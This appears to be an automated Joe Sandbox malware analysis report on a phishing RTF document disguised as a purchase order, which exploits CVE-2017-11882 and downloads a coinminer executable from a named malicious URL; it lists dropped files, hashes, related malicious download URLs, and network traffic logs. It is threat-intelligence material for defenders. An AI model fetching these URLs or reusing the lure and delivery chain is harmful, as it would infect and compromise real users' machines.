          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO4018308875.doc41%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe24%ReversingLabsByteCode-MSIL.Coinminer.BitCoinMiner
          C:\Users\user\AppData\Local\Temp\princedan859323.exe24%ReversingLabsByteCode-MSIL.Coinminer.BitCoinMiner
          C:\Users\user\AppData\Roaming\princedan859323.exe24%ReversingLabsByteCode-MSIL.Coinminer.BitCoinMiner

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://topv.xyz/princedanx.exe100%Avira URL Cloudmalware
          www.containerflippers.com/np0c/0%Avira URL Cloudsafe
          http://go.microso0%Avira URL Cloudsafe
          http://www.opera.com00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          topv.xyz
          185.239.243.112
          truetrue
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://topv.xyz/princedanx.exetrue
            • Avira URL Cloud: malware
            unknown
            www.containerflippers.com/np0c/true
            • Avira URL Cloud: safe
            low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://go.microsoprincedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.opera.com0princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drfalse
            • Avira URL Cloud: safe
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            185.239.243.112
            topv.xyzMoldova Republic of
            55933CLOUDIE-AS-APCloudieLimitedHKtrue

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:452509
            Start date:22.07.2021
            Start time:14:13:52
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 27s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:PO4018308875.doc
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winDOC@24/10@2/1
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 89%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .doc
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe
            • TCP Packets have been reduced to 100
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452509/sample/PO4018308875.doc

            Simulations

            Behavior and APIs

            TimeTypeDescription
            14:14:35API Interceptor39x Sleep call for process: EQNEDT32.EXE modified
            14:14:37API Interceptor284x Sleep call for process: princedan859323.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            185.239.243.112ORDER . 4500028602 .docGet hashmaliciousBrowse
            • sabaint.me/polanco/peso.exe
            Document02.docGet hashmaliciousBrowse
            • ebie.xyz/whesilox.exe
            product list.docGet hashmaliciousBrowse
            • ebie.xyz/arinzex.exe
            Doc56576847896543987652134.docGet hashmaliciousBrowse
            • ebie.xyz/catx.exe
            KOC_RFQ.docGet hashmaliciousBrowse
            • ebie.xyz/mazx.exe
            RFQ.docGet hashmaliciousBrowse
            • ebie.xyz/mazx.exe
            RFQ NO. 352008.docGet hashmaliciousBrowse
            • ebie.xyz/quotation.exe
            Reques for quotation 775887886966.docGet hashmaliciousBrowse
            • ebie.xyz/ugopoundx.exe
            6AOqEvqF3M.exeGet hashmaliciousBrowse
            • sabaint.me/inc/4f4d258ff734e9.php
            ORDER_683703789238738.xlsxGet hashmaliciousBrowse
            • sabaint.me/inc/4f4d258ff734e9.php
            product list.docGet hashmaliciousBrowse
            • ebie.xyz/arinzex.exe
            KV18RE001-A5193.docGet hashmaliciousBrowse
            • ebie.xyz/whesilox.exe
            REQUIREMENT-DWG-454888_2021.docGet hashmaliciousBrowse
            • ebie.xyz/whesilox.exe
            purchase order.docGet hashmaliciousBrowse
            • ebie.xyz/mazx.exe
            product list.docGet hashmaliciousBrowse
            • ebie.xyz/arinzex.exe
            M9M9ZylTGS.exeGet hashmaliciousBrowse
            • sabaint.me/inc/4f4d258ff734e9.php
            FLK0057021_1062.docGet hashmaliciousBrowse
            • ebie.xyz/whesilox.exe
            DOC.1000000567.267805032019.doc__.rtfGet hashmaliciousBrowse
            • ebie.xyz/catx.exe
            13076885-RFQ.docGet hashmaliciousBrowse
            • lontorz.xyz/bigheadx.exe
            soa.xlsxGet hashmaliciousBrowse
            • lontorz.xyz/wealthx.exe

            Domains

            No context

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            CLOUDIE-AS-APCloudieLimitedHKORDER . 4500028602 .docGet hashmaliciousBrowse
            • 185.239.243.112
            Document02.docGet hashmaliciousBrowse
            • 185.239.243.112
            product list.docGet hashmaliciousBrowse
            • 185.239.243.112
            jEbpttXKCaGet hashmaliciousBrowse
            • 45.114.9.184
            Doc56576847896543987652134.docGet hashmaliciousBrowse
            • 185.239.243.112
            KOC_RFQ.docGet hashmaliciousBrowse
            • 185.239.243.112
            RFQ.docGet hashmaliciousBrowse
            • 185.239.243.112
            RFQ NO. 352008.docGet hashmaliciousBrowse
            • 185.239.243.112
            Reques for quotation 775887886966.docGet hashmaliciousBrowse
            • 185.239.243.112
            6AOqEvqF3M.exeGet hashmaliciousBrowse
            • 185.239.243.112
            ORDER_683703789238738.xlsxGet hashmaliciousBrowse
            • 185.239.243.112
            product list.docGet hashmaliciousBrowse
            • 185.239.243.112
            KV18RE001-A5193.docGet hashmaliciousBrowse
            • 185.239.243.112
            REQUIREMENT-DWG-454888_2021.docGet hashmaliciousBrowse
            • 185.239.243.112
            purchase order.docGet hashmaliciousBrowse
            • 185.239.243.112
            product list.docGet hashmaliciousBrowse
            • 185.239.243.112
            M9M9ZylTGS.exeGet hashmaliciousBrowse
            • 185.239.243.112
            FLK0057021_1062.docGet hashmaliciousBrowse
            • 185.239.243.112
            DOC.1000000567.267805032019.doc__.rtfGet hashmaliciousBrowse
            • 185.239.243.112
            recovered_bin2Get hashmaliciousBrowse
            • 103.215.93.26

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            C:\Users\user\AppData\Local\Temp\princedan859323.exe9thuIDnsFV.exeGet hashmaliciousBrowse
              C:\Users\user\AppData\Roaming\princedan859323.exe9thuIDnsFV.exeGet hashmaliciousBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe9thuIDnsFV.exeGet hashmaliciousBrowse

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:downloaded
                  Size (bytes):648912
                  Entropy (8bit):6.555584592279825
                  Encrypted:false
                  SSDEEP:12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
                  MD5:0E715DB2198FF670F4BF0E88E0E9B547
                  SHA1:2DE5030A9261655E5879E4FABA7B5E79D1DD483E
                  SHA-256:4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
                  SHA-512:8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 24%
                  Joe Sandbox View:
                  • Filename: 9thuIDnsFV.exe, Detection: malicious, Browse
                  IE Cache URL:http://topv.xyz/princedanx.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@.................................<...W........(........................................................................... ............... ..H............text........ ...................... ..`.rsrc....(.......*..................@..@.reloc..............................@..B................x.......H................... ....1...n...........................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0..%........(.......,.&&...-.&&+.}....+.}....+.*....0..\........(.... .U...-.&.s.....-.&&(....~....%-/+.(....+.}....+.&~..........s....%.-.&+......+.o....*.0..).........s.....,.&..(....-.+..+..{.....o.....*.*....0..$.........(.....-.&.,.+..+..{.....o....&.*.*.0.............-.&{.......-.&o....+.&+.&+.*..0.............-.&{.
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B09F78D-537D-406E-B057-1B1541B1D39D}.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1024
                  Entropy (8bit):0.05390218305374581
                  Encrypted:false
                  SSDEEP:3:ol3lYdn:4Wn
                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                  Malicious:false
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C67C7B4A-7023-4170-93C2-146687425423}.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):13060
                  Entropy (8bit):3.6035304738533385
                  Encrypted:false
                  SSDEEP:384:Cl+vMM/BDBMlLLlJYALFfVaiYeZSFOgRd877HAIVAInZ:CAUM/VBMBL/TZIRm771HZ
                  MD5:2DB4DE4C5E457296FF44D1728A100C76
                  SHA1:2AB1FB75384D496227A18FC5F53F2AAC1DE4851E
                  SHA-256:E9B6823D049FAA04166EE7C5333D356B417E1C4F8BCCF2C416ACB954F3896B85
                  SHA-512:858EA2D72F6C9BBF797E45BA08B4A7BF7A36973402496255C62C6369BAE4698384CF18A0E669471C237931D94BBB31755891D20ED01BDF9BADB3D57683198541
                  Malicious:false
                  Preview: ;.|.2...?...2...&.`...|.>.%.-.<./.3.8.>.!.9.0.%.].?.6.-.9.>...4.).7.6.?.;.&._..._...?.*.?.*.<.@.).6.7.'...@.&.&.?.4.$.,.%.1.../.+.9.%.?...&.|.6.[.:.?.|.:.[.?.&.?.(.%.:.-.+.*.>.9.'.?.?.:.]...1.-.-.8.3._.'.7.*.'.'...=.4.0.].#.%.6.0.9.0.8.,.;._.4.?.9.$.?.8.>.(.3...+.7.4.?.+.(.[.?.8...'.:.8.`.?.?.%.?.?.<...8.....^.3.2.?.*.8.;.%.%.(.|.3.;.6.;.?.2.<.).7.8.=.:.7.7.^.0.&...3.0.[.@.).^.8.>./.!.@.[.?.6.7.^.(.].5.$.2.~.:.-.0.2.>.;.=.>._.<.4.-.-.[.4.&.'.4.?.*.9.2...%.:.%.#.0...>.6...7...0.:.%.(...?...!.7.&...2.)...7.|.).!.*.<.5.5.$.2.3.].3.5.'.?.$.(.?.8.5.-.^.^.?.%.7._.~.;.....?.(...2.(.4.:.?.(./.?.2.].(.[.0.4...7.+.(.5.?.=.6.3.|.<.>.=.2._.#...].?.?.>...@.!.^.|.3.+.+...%.=.+.!.?.0.~.?.?.@.#.*.+.^.6.?.[.+./.#.2._.7.*.8.<.`.4.9.$.?.~.%.9...).~.$.?.~.*.).%.!.3.+.-.1.<.5.5...,.'.8.6.^.*...%./...$.-.>.?.*.;.(.*.;...+.|.`./.....2.*.).@.-...].^._...+.;./.|.<.>.)...8./.#.6.(.%.;.#.).].`.3.@.@.?.].$.'.).(.:.(.&.8.?.0.8.`.6.2.).0.7.3.=.?.*.:.5.7.~.....&.,.5.,.4.4.*.>.&.(.7...:.-.:.%.`.?.?.#.&.).<.;.=.).....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F7C72BCE-A594-453E-9048-97C10E531855}.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1536
                  Entropy (8bit):1.3550337874831702
                  Encrypted:false
                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb4:IiiiiiiiiifdLloZQc8++lsJe1MzD
                  MD5:9BDF023D1B68473A259350323CCCE99B
                  SHA1:B56CDFA0AFE1A41A14D0338577B154664D30A1C8
                  SHA-256:1E0CB911731852A3D7848B5059595B5598052192AC76D95212FB3661B337C043
                  SHA-512:894B4E706923F6F6BB297882884C49A2F1C1FA04F8807F554EA8B71AA1269F38E1EDD3D776601D72BAB90C1FF1F91866184F91B44E47FB254D57453811C182BC
                  Malicious:false
                  Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Process:C:\Users\user\AppData\Roaming\princedan859323.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):648912
                  Entropy (8bit):6.555584592279825
                  Encrypted:false
                  SSDEEP:12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
                  MD5:0E715DB2198FF670F4BF0E88E0E9B547
                  SHA1:2DE5030A9261655E5879E4FABA7B5E79D1DD483E
                  SHA-256:4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
                  SHA-512:8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 24%
                  Joe Sandbox View:
                  • Filename: 9thuIDnsFV.exe, Detection: malicious, Browse
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@.................................<...W........(........................................................................... ............... ..H............text........ ...................... ..`.rsrc....(.......*..................@..@.reloc..............................@..B................x.......H................... ....1...n...........................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0..%........(.......,.&&...-.&&+.}....+.}....+.*....0..\........(.... .U...-.&.s.....-.&&(....~....%-/+.(....+.}....+.&~..........s....%.-.&+......+.o....*.0..).........s.....,.&..(....-.+..+..{.....o.....*.*....0..$.........(.....-.&.,.+..+..{.....o....&.*.*.0.............-.&{.......-.&o....+.&+.&+.*..0.............-.&{.
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO4018308875.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jul 22 20:14:33 2021, length=50939, window=hide
                  Category:dropped
                  Size (bytes):2048
                  Entropy (8bit):4.516075145711735
                  Encrypted:false
                  SSDEEP:24:8FT/XTd6jFyBNRJegER8Dv3qgdM7dD2FT/XTd6jFyBNRJegER8Dv3qgdM7dV:81/XT0jFGNUgQh21/XT0jFGNUgQ/
                  MD5:229CF85BF54BC33AB9218FEB0D78C9D2
                  SHA1:B360F768D9A7289E543DBC46A3BBA17AA14C3201
                  SHA-256:25DCC5819EEFE9F405B0C6797B09E7E614C6CC3A058CACC465652FBA2A50B5FF
                  SHA-512:10F4461E8441D7628CC8E0C2296D7E81631643A715B8689D840D0EF49809378D4C8894FDE69783C578A5EB8871C0F3E720DE4F7CEE14FD6B1D1E1F51AFC7E4E1
                  Malicious:false
                  Preview: L..................F.... ........{.......{..b...>................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2......R. .PO4018~1.DOC..N.......Q.y.Q.y*...8.....................P.O.4.0.1.8.3.0.8.8.7.5...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\PO4018308875.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.4.0.1.8.3.0.8.8.7.5...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9F.C...........[D_....3N...W
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):74
                  Entropy (8bit):4.218418487239803
                  Encrypted:false
                  SSDEEP:3:M1gzUcQeUltbcQeUlmX1gzUcQeUlv:MizYeSfeszYe2
                  MD5:839E988B45AF03E03223EAFB330777D7
                  SHA1:0125F60C82CE60C0A57E62FB19BB9EC4EB122ADE
                  SHA-256:65A555177CBA318C35718AC9B0938024CC9B315DDC93B0FEC888A1E1ACCFB555
                  SHA-512:2994B9CC0865A8454CC81DE3F0B359AEC48F0597FD58661A5299C00E16CF46A3370A721D24A449C934F83DE85700911471ADA751CDCE2B02FBE6B1B36C8A8836
                  Malicious:false
                  Preview: [doc]..PO4018308875.LNK=0..PO4018308875.LNK=0..[doc]..PO4018308875.LNK=0..
                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.4311600611816426
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                  MD5:390880DCFAA790037FA37F50A7080387
                  SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                  SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                  SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                  Malicious:false
                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                  C:\Users\user\AppData\Roaming\princedan859323.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):648912
                  Entropy (8bit):6.555584592279825
                  Encrypted:false
                  SSDEEP:12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
                  MD5:0E715DB2198FF670F4BF0E88E0E9B547
                  SHA1:2DE5030A9261655E5879E4FABA7B5E79D1DD483E
                  SHA-256:4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
                  SHA-512:8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 24%
                  Joe Sandbox View:
                  • Filename: 9thuIDnsFV.exe, Detection: malicious, Browse
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@.................................<...W........(........................................................................... ............... ..H............text........ ...................... ..`.rsrc....(.......*..................@..@.reloc..............................@..B................x.......H................... ....1...n...........................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0..%........(.......,.&&...-.&&+.}....+.}....+.*....0..\........(.... .U...-.&.s.....-.&&(....~....%-/+.(....+.}....+.&~..........s....%.-.&+......+.o....*.0..).........s.....,.&..(....-.+..+..{.....o.....*.*....0..$.........(.....-.&.,.+..+..{.....o....&.*.*.0.............-.&{.......-.&o....+.&+.&+.*..0.............-.&{.
                  C:\Users\user\Desktop\~$4018308875.doc
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.4311600611816426
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                  MD5:390880DCFAA790037FA37F50A7080387
                  SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                  SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                  SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                  Malicious:false
                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                  Static File Info

                  General

                  File type:Rich Text Format data, unknown version
                  Entropy (8bit):2.507525665153884
                  TrID:
                  • Rich Text Format (5005/1) 55.56%
                  • Rich Text Format (4004/1) 44.44%
                  File name:PO4018308875.doc
                  File size:50939
                  MD5:1e7bc879d7960afaa08148c635ae534f
                  SHA1:e1a0db056bdc1cba07ef43c27a80e5bfd79b4eac
                  SHA256:8c4b07ce49252a4ed12ad611a9f8fde65a63fc12368c6726776e86e140d3872e
                  SHA512:87305e45665309e3e6de38aae33a61481445257cbef1f4ce268db0223481bb6b0acaed8d81aafee00a43d53b0278fd27a2fcd34ef51b670ca86c34108ea49366
                  SSDEEP:384:4X84SHQPomX+n++jLu9qk2kw03n6bL+p5DhnxKxGS:4aR++jLu9Mkw07p5D9xKxGS
                  File Content Preview:{\rtf340281;|2.?.2.&`.|>%-</38>!90%]?6-9>.4)76?;&_._.?*?*<@)67'.@&&?4$,%1./+9%?.&|6[:?|:[?&?(%:-+*>9'??:].1--83_'7*''.=40]#%60908,;_4?9$?8>(3.+74?+([?8.':8`??%??<.8..^32?*8;%%(|3;6;?2<)78=:77^0&.30[@)^8>/!@[?67^(]5$2~:-02>;=>_<4--[4&'4?*92.%:%#0.>6.7.0:%(

                  File Icon

                  Icon Hash:e4eea2aaa4b4b4a4

                  Static RTF Info

                  Objects

                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                  00000177Chno
                  100001739h2embeddedEQuaTION.31415no

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 22, 2021 14:14:41.282041073 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.335072994 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.335156918 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.335500002 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.441359043 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441436052 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441481113 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441525936 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441570044 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441615105 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441658974 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441703081 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441745996 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441788912 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.441832066 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.442677975 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.458735943 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.496299982 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496339083 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496356964 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496376038 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496525049 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.496820927 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496845961 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496870041 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496891022 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496910095 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496932983 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496956110 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496963024 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.496977091 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.496982098 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.496989965 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.496993065 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.497004032 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.497025967 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.497047901 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.497070074 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.497077942 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.497090101 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.497102022 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.497113943 CEST8049165185.239.243.112192.168.2.22
